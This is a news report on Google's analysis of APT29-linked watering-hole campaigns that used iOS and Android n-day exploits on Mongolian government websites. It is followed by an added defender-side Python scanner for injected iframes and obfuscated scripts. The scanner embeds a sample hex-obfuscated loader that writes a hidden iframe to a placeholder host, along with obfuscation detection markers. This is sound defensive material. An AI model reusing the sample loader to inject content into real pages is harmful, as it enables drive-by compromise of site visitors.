
Google reports watering-hole attacks on Mongolian sites leveraged iOS and Android exploits

Google LLC’s Threat Analysis Group today shared details on multiple observed in-the-wild exploit campaigns that used watering-hole attacks on Mongolian government websites between November 2023 and July this year.

A watering-hole attack is a strategy that involves attackers compromising legitimate websites that their target or targets frequently visit by embedding malicious code to exploit vulnerabilities in the target’s devices. The goal is to infect visitors with malware or steal sensitive information when they access the compromised site.

In the campaign targeting Mongolian government websites, the attackers went after mobile users on both Apple Inc. iOS and Android devices. They first delivered an iOS WebKit exploit affecting iOS versions older than 16.6.1 and later a Chrome exploit chain against Android users running Chrome versions from m121 to m123.

The campaigns delivered n-day exploits: patches for the vulnerabilities were already available, but the exploits were still effective against devices that had not been updated.

The attackers delivered the iOS exploit by altering the compromised websites to serve an iframe that loaded the malicious code against unpatched Apple phones. The payload included a cookie-stealer framework previously seen in 2021 targeting European officials, as well as a reconnaissance payload that identified vulnerable devices before the exploit was deployed.

The campaign targeting Android, which also involved the compromise of Mongolian government websites, used obfuscated JavaScript to inject the malicious iframe, leveraging a previously known NSO Group exploit method. The final payload collected sensitive user data, including cookies, account information and browsing history.
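The two delivery mechanisms described above, an injected iframe serving the exploit and obfuscated JavaScript that plants it, are the artefacts a site operator can look for in their own served pages. The following is an added example, not code from the article or from Google's Threat Analysis Group: a defender-side integrity check that parses a page and flags iframes pointing at hosts outside an operator-maintained allow-list, iframes hidden from the user, and inline scripts that score high on simple obfuscation heuristics. The allow-list, the hostnames and the sample page are constructed placeholders.

```python
"""Defender-side integrity check for injected iframes and obfuscated
inline scripts in a site's served HTML.

Added example, not code from the article or from Google TAG. It assumes
the operator maintains a list of hosts the site legitimately frames or
loads scripts from (constructed placeholder below) and scans a page for
the artefacts the article describes: an <iframe> pointing at an
unexpected origin (or hidden from the user) and inline JavaScript that
looks obfuscated.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Calls and fragments that obfuscated loaders commonly lean on.
OBFUSCATION_MARKERS = ("eval(", "unescape(", "fromCharCode", "atob(", "document.write(")
HEX_ESCAPE = re.compile(r"\\x[0-9a-fA-F]{2}|\\u[0-9a-fA-F]{4}")


def obfuscation_score(js):
    """Crude heuristic: one point per distinct marker present, one point for a
    very long line, one point for a run of hex/unicode escapes."""
    score = sum(1 for marker in OBFUSCATION_MARKERS if marker in js)
    if any(len(line) > 400 for line in js.splitlines()):
        score += 1
    if len(HEX_ESCAPE.findall(js)) >= 10:
        score += 1
    return score


class InjectionScanner(HTMLParser):
    """Collects (kind, line, detail) findings while parsing one page."""

    def __init__(self, page_host, allowed_hosts):
        super().__init__()
        self.page_host = page_host
        self.allowed_hosts = set(allowed_hosts) | {page_host}
        self.findings = []
        self._script_buf = None  # list while inside an inline <script>, else None
        self._script_line = 0

    def _host_of(self, url):
        # Relative URLs resolve to the page's own host.
        return urlparse(url).hostname or self.page_host

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        line = self.getpos()[0]
        if tag == "iframe":
            src = a.get("src") or ""
            if self._host_of(src) not in self.allowed_hosts:
                self.findings.append(("third_party_iframe", line, src))
            style = (a.get("style") or "").replace(" ", "").lower()
            if "display:none" in style or "visibility:hidden" in style or a.get("width") == "0":
                self.findings.append(("hidden_iframe", line, src))
        elif tag == "script":
            src = a.get("src")
            if src:
                if self._host_of(src) not in self.allowed_hosts:
                    self.findings.append(("third_party_script", line, src))
            else:
                self._script_buf, self._script_line = [], line

    def handle_data(self, data):
        # HTMLParser hands <script> bodies to handle_data unescaped.
        if self._script_buf is not None:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._script_buf is not None:
            body = "".join(self._script_buf)
            self._script_buf = None
            score = obfuscation_score(body)
            if score >= 2:
                self.findings.append(("obfuscated_inline_script", self._script_line, "score=%d" % score))


def scan_page(html, page_host, allowed_hosts):
    """Return the list of (kind, line, detail) findings for one page."""
    scanner = InjectionScanner(page_host, allowed_hosts)
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed sample page: a legitimately framed calendar plus the two
# injected artefacts a defender should catch (hostnames are placeholders).
SAMPLE_PAGE = r"""<html><head><title>Ministry news</title>
<script src="/static/site.js"></script>
<script>
var _0x1f=["\x68\x74\x74\x70\x73\x3a\x2f\x2f","\x69\x66\x72\x61\x6d\x65"];
document.write(unescape("%3C"+_0x1f[1]+"%20src%3D%22"+_0x1f[0]+"cdn.invalid-tracker.example%2Fv%22%3E"));
</script>
</head><body>
<h1>Press releases</h1>
<iframe src="https://www.example.gov.mn/embed/calendar" width="300"></iframe>
<iframe src="https://cdn.invalid-tracker.example/v" style="display: none" width="0" height="0"></iframe>
</body></html>"""

if __name__ == "__main__":
    for kind, line, detail in scan_page(SAMPLE_PAGE, "www.example.gov.mn", set()):
        print("line %d: %s %s" % (line, kind, detail))
```

A static scan like this catches an iframe written into the page and the obfuscated loader itself, but not an iframe the loader creates at runtime in the visitor's browser, so it belongs alongside file-integrity monitoring of the web root and a Content-Security-Policy whose frame-src and script-src directives restrict where frames and scripts may come from.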

Both campaigns are said to have reused or closely mirrored exploits previously observed from commercial surveillance vendors such as Intellexa and NSO Group Ltd. However, the attackers’ methods and objectives differed in some notable ways; cookie theft and data exfiltration, for example, are more in line with state-sponsored activity. “We assess with moderate confidence the campaigns are linked to the Russian government-backed actor APT29,” the Google researchers wrote.

APT29, also known as Cozy Bear, has previously been linked to or credited with attacks on TeamViewer SE in June and an attack on the U.S. Treasury and Commerce Departments in December 2020.

“Watering hole attacks remain a threat where sophisticated exploits can be utilized to target those that visit sites regularly, including on mobile devices,” Google’s researchers conclude. “Watering holes can still be an effective avenue for n-day exploits by mass targeting a population that might still run unpatched browsers.”

Source: siliconangle.com
